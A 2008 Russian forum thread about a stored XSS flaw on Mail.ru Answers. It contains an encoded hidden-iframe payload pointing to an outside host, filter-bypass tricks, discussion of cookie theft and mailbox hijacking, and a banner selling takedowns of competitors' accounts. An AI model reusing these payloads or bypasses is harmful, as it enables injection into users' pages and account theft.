УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Уязвимость на Ответах Мейлру

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимость на Ответах Мейлру

13.02.2008, 17:22

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Уязвимость на Ответах Мейлру

Сегодня мной была обнаружена уязвимость на Проекте Ответы Mail>ru

В результате можно было встроить айфрейм с сайтом произвольным в коментарии и в вопросы...
и соответственно любой вредоносный код...

примеры здесь

примеры
примеры
примеры
А также были фреймы с моим порносайтом .. но их удалили

Собственно -рассказываю как )))

все теги фильтруются и обрезаются...
с этим не поспоришь -майловцы молодцы )))

Но они упустили кое что
если теги заурленкодить Можно здесь

То они на мейлру уже декодируются а дальше не фильтруются!!!!
и в итоге получаем .... хехех ... попробую на ачате )))
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E

на ачате форум фильтрует все ... точнее не перекодирует обратно урленкод..

PHP код:


		
			
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E

вот такая загогулина... и ее постим в каментах или в вопросе...
и получаем фрейм.. также можно любые теги....
кроме

Код HTML:

<script>

Вотс... правда я как законопослушный гражданин -написал в суппорт и админам .. так что ..вот такая вот загогулина ))

Последний раз редактировалось попугай; 13.02.2008 в 20:35..

13.02.2008, 18:58

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

http://otvet.mail.ru/question/12964134/

13.02.2008, 19:18

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Я только не очень силен в яваскрипте.... но можно ведь как то получить доступ через фрейм к родительскому окну ?

13.02.2008, 19:44

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Жаль скрипты все таки фильтируются

Последний раз редактировалось попугай; 13.02.2008 в 20:30..

14.02.2008, 03:26

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

скрпты тоже можно писать !!!!
Опять же урленкодим....

таким образом...

PHP код:


		
			
<input type=button onclick=скрипт произвольный>

одно но... кавычки заслешиваются... так что серьезного ничего не сделать....

PS // хмм... и кавычки можно обойти ))

Последний раз редактировалось попугай; 14.02.2008 в 04:19..

14.02.2008, 21:23

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Таак... Скрипты в виде <script> </script>
тоже можно писать -требуется двойное урленкодирование

Однако главная проблема -почему нельзя передать куки на скрипт .. -это то , что
ссылки фильтруются -то есть
если есть http -то перед ним ставятся теги <noindex> , <nofollow>
и которые портят код .
Если у кого есить идеи -выкладывайте

15.02.2008, 05:55

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

X) X)
Все уязвимости прикрыли X)

23.02.2008, 05:29

ZET36

Участник форума

Регистрация: 08.10.2007

Сообщений: 259

Провел на форуме:
500748

Репутация: 137

во первых зря то сообщил админам маила
во вторых зря что выложил баг в паблик этоже активна хсс в маил ру
получить доступ к 1вому фрэйму (где авторизованные куки) через родительское окно в джаваскрипт можно так

Код:

parent.имя фрэйма.document.cookie

если бы не ступил то мог бы беспалива хакать мыльники

05.04.2008, 02:16

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

parent.имя фрэйма.document.cookie

нельзя так... Да я и пробовал
это разные домены - и получить доступ из одного домена в другой нельзя

PS да может и зря... конечно...но гражданский долг меня позвал )))

#10

05.04.2008, 03:28

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

Провел на форуме:
10605912

Репутация: 4693

Вместо 'http://' можешь писать просто '//'

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
В ядре Linux обнаружена критическая уязвимость	biophreak	Мировые новости	8	01.09.2008 22:08
Множественные уязвимости в Apple Macintosh OS X	Mr. P.S.	*nix	1	02.02.2008 17:53
Уязвимость WZC в Windows XP	DRON-ANARCHY	Мировые новости	5	10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer	DRON-ANARCHY	Мировые новости	0	02.10.2005 22:28
Открытие файлов и внешние данные. Потенциальная уязвимость php-скриптов	k00p3r	Чужие Статьи	1	11.07.2005 19:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход